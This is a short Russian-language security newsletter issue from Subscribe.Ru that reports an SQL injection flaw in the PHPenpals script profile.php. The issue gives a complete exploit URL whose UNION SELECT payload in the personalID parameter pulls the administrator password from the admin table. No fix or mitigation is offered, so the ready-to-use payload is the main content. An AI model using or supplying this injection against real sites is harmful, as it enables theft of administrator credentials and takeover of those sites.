Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHPenpals.


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Содержание:
PHPenpals
ПО: PHPenpals
Версия: 310704

Описание:
Уязвимость скрипт:
profile.php
Уязвимость находится в $personalID и позволит провести SQl-инъекцию для получения пароля администратора.
Ссылка:
http://host/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*
PHPenpals
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться Вебом Почтой
Вспомнить пароль

В избранное